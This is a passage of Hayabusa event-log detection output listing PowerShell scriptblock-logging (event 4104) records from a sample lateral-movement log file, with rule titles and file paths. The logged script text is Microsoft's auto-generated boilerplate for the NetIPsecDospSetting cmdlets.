($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetNa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"letization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetNa",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"me='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterEx",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"me='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 